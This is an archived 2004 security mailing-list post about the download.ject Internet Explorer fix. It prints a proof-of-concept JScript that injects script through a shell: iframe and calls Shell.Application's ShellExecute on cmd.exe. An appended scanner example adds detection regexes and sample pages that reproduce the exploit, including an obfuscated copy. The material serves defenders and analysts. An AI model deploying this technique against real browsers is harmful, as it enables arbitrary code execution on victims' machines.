Educause Security Discussion mailing list archives

Re: critical Microsoft fix for download.ject


From: Gary Flynn <flynngn () JMU EDU>
Date: Fri, 2 Jul 2004 17:12:32 -0400

Jordan Wiens wrote:

For the first public discovery and analysis of the new exploits (by
Jelmer; the author who discovered the original adodb.stream issue), see:

http://62.131.86.111/analysis.htm

Note that Jelmer just posted the following to the full disclosure
mailing list in reference to this "critical update": (don't follow
the link with IE)

******************************************************************
Too bad it won't do you one ounce any good

http://62.131.86.111gf/security/idiots/malware2k/installer.htm

Credit: http-equiv
******************************************************************





gf: Through a series of script calls, it eventually gets to:

********************************************************************
function injectIt() {
  // Write a script block into the document of the first frame (the
  // shell:-sourced iframe created below). That script creates a
  // Shell.Application object and calls ShellExecute to run cmd.exe /c pause.
  document.frames[0].document.body.insertAdjacentHTML('afterBegin',
    'injected<gfscript language="JScript" DEFER>' +
    'var obj=new ActiveXObject("Shell.Application");' +
    'obj.ShellExecute("cmd.exe","/c pause");' +
    '</gfscript>');
}
// Load a local file through the shell: handler into an iframe, then
// call injectIt() after giving the frame a second to load.
document.writegf('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
**********************************************************************

My limited understanding of the problem makes me suspect that the
Shell.Application object is used instead of the ADODB stream
object to perform the nasty work after the defect is exploited,
so don't get comfortable with IE just yet.

--
Gary Flynn
Security Engineer
James Madison University

**********
Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at 
http://www.educause.edu/cg/.
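Added example (not part of the archived post, and not code from Jelmer, http-equiv or the list): a small Node.js indicator scanner for HTML/JScript content that looks for the hallmarks of the Shell.Application variant quoted in the post (a frame sourced from a shell: URL, cross-frame insertAdjacentHTML, new ActiveXObject("Shell.Application"), a ShellExecute call) alongside the older ADODB.Stream indicator. It decodes the cheap %XX, \xXX, \uXXXX and &#NN; escapes first so a lightly obfuscated copy of the same payload is still caught. The indicator names, the verdict labels and the sample pages are this example's own constructions modelled on the snippet above; nothing here is from the original page.

```javascript
// Added example: indicator scanner for the shell:/Shell.Application variant
// quoted in the post, plus the older ADODB.Stream one. Indicator names and
// verdict labels are this example's own choices (assumptions), not from the post.

const INDICATORS = [
  // <iframe src="shell:..."> / <frame src=shell:...>: a frame sourced from the shell: handler
  { name: 'shell-protocol-frame', re: /<i?frame[^>]*\bsrc\s*=\s*["']?shell:/i },
  // Instantiation of the Shell.Application COM object from script
  { name: 'shell-application-activex',
    re: /new\s+ActiveXObject\s*\(\s*["']Shell\.Application["']\s*\)/i },
  // ShellExecute call (the part that launches cmd.exe in the quoted snippet)
  { name: 'shellexecute-call', re: /\.ShellExecute\s*\(/i },
  // Parent page writing HTML into a child frame's document
  { name: 'cross-frame-html-injection',
    re: /frames\s*\[\s*\d+\s*\]\s*\.document\s*\.body\s*\.insertAdjacentHTML/i },
  // The object the Microsoft download.ject fix disables
  { name: 'adodb-stream-activex', re: /ActiveXObject\s*\(\s*["']ADODB\.Stream["']\s*\)/i },
];

function normalize(text) {
  // Decode the cheap obfuscations seen in drive-by pages so the regexes see
  // plain text: %XX URL escapes, \xXX / \uXXXX JScript escapes and &#NN; /
  // &#xHH; character references. Two passes so a doubly-escaped payload
  // (e.g. %5C%78 -> \x..) also comes out.
  let out = text;
  for (let pass = 0; pass < 2; pass++) {
    out = out
      .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
      .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
      .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
      .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
      .replace(/&#(\d+);/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
  }
  return out;
}

function scanForIndicators(content) {
  const text = normalize(content);
  return INDICATORS.filter((ind) => ind.re.test(text)).map((ind) => ind.name);
}

function classify(content) {
  const hits = scanForIndicators(content);
  const has = (n) => hits.includes(n);
  let verdict = 'clean';
  if (has('shell-application-activex') || has('shellexecute-call')) {
    verdict = 'shell-application-variant';
  } else if (has('adodb-stream-activex')) {
    verdict = 'adodb-stream-variant';
  } else if (has('shell-protocol-frame') || has('cross-frame-html-injection')) {
    verdict = 'review'; // zone-crossing plumbing without a visible payload
  }
  return { verdict, hits };
}

// Constructed sample pages (not captured traffic). The first is modelled on
// the snippet quoted in the post, the second is the same idea with %XX and
// \xXX escapes, the third uses ADODB.Stream, the fourth is benign.
const SAMPLE_SHELL_VARIANT = `
<html><body><script>
function injectIt() {
  document.frames[0].document.body.insertAdjacentHTML('afterBegin',
    'injected<script language="JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>');
}
document.write('<iframe src="shell:WINDOWS\\\\Web\\\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
</script></body></html>`;

const SAMPLE_OBFUSCATED = `
<script>
document.write(unescape('%3Ciframe%20src%3D%22shell:WINDOWS%5CWeb%5CTIP.HTM%22%3E%3C/iframe%3E'));
var o = new ActiveXObject("\\x53hell.\\x41pplication");
o.ShellExecute("cmd.exe", "/c pause");
</script>`;

const SAMPLE_ADODB = `
<script>
var s = new ActiveXObject("ADODB.Stream");
s.Type = 1; s.Open();
</script>`;

const SAMPLE_BENIGN = `
<html><body>
<iframe src="https://intranet.example/news.htm"></iframe>
<script>document.getElementById('x').insertAdjacentHTML('afterBegin', 'hi');</script>
</body></html>`;

for (const [label, page] of Object.entries({ SAMPLE_SHELL_VARIANT, SAMPLE_OBFUSCATED, SAMPLE_ADODB, SAMPLE_BENIGN })) {
  const r = classify(page);
  console.log(`${label}: ${r.verdict} [${r.hits.join(', ')}]`);
}
```

The regexes deliberately run over the decoded raw text rather than a parsed DOM, so the script-in-a-string construction from the post (the payload lives inside the insertAdjacentHTML argument) is matched the same way as an inline script block.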
